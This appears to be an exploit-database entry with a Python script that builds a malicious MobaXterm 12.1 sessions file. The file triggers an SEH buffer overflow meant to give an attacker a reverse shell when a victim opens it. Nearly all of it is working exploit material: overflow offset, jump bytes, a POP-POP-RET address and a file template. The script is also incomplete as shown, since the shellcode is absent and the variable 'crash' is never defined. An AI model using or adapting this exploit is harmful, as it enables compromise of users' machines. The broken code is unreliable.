Exploits / Vulnerability Discovered : 2019-09-27 |
Type : local |
Platform : windows
This exploit / vulnerability Mobatek mobaxterm 12.1 buffer overflow (seh) is for educational purposes only and if it is used you will do on your own risk!
# Description:
# SEH based Buffer Overflow in the Username field of a valid session
# This exploit generates a malicious MobaXterm sessions file
# When the user double clicks in the session, the shellcode is going to be executed
# You need to adapt the exploit to your current OS Windows version
#!/usr/bin/env python
# This is not the IP address of the reverse shell
# To be able to exploit the BOF you need to have a real machine with an open port that the target machine can reach
ip_address = "192.168.1.88"
port = "22"
# We are going to recreate a MobaXterm sessions file export
print ("[+] Creating the malicious MobaXterm file...")
sessions_file = ""
sessions_file += "[Bookmarks]\n"
sessions_file += "SubRep=\n"
sessions_file += "ImgNum=42\n"
sessions_file += "pwnd=#109#0%" + ip_address + "%" + port + "%"
# Here is the SEH Based Buffer Overflow part
# [*] Exact match at offset 16672
# We have to substract 4 that corresponds to NSEH
junk1 = "A" * 16668
# Here we need to jump forward but EB is a bad char
# We decrease ESP and use a conditional jump after
# I have learned this trick in OSCE. Thank you Muts
nseh = ""
nseh += "\x4C" # DEC ESP
nseh += "\x4C" # DEC ESP
nseh += "\x77\x21" # JA SHORT 1035FE59
# Using a XP-SP1 so modules are compiled without SafeSEH
# !mona seh -cp asciiprint
# 0x762C5042 POP-POP-RET crypt32.dll
seh = "\x42\x50\x2C\x76"
# Some padding that we are going to jump over it
junk2 = "\x42" * 29
# We recover the initial state of the stack
alignment = ""
alignment += "\x44" # INC ESP
alignment += "\x44" # INC ESP
# We need to mantain the MobaXterm sessions file structure
sessions_file += crash
sessions_file += "%%-1%-1%%%22%%0%0%0%%%-1%0%0%0%%1080%%0%0%1#MobaFont%10%0%0%0%15%236,236,236%30,30,30%180,180,192%0%-1%0%%xterm%-1%-1%_Std_Colors_0_%80%24%0%1%-1%<none>%%0#0# #-1"
# We generate the file
f = open( 'pwnd.mxtsessions', 'w' )
f.write(sessions_file)
f.close()
print ("[+] pwnd.mxtsessions file created!")
print ("[+] Import the sessions in MobaXterm and wait for the reverse shell! :)")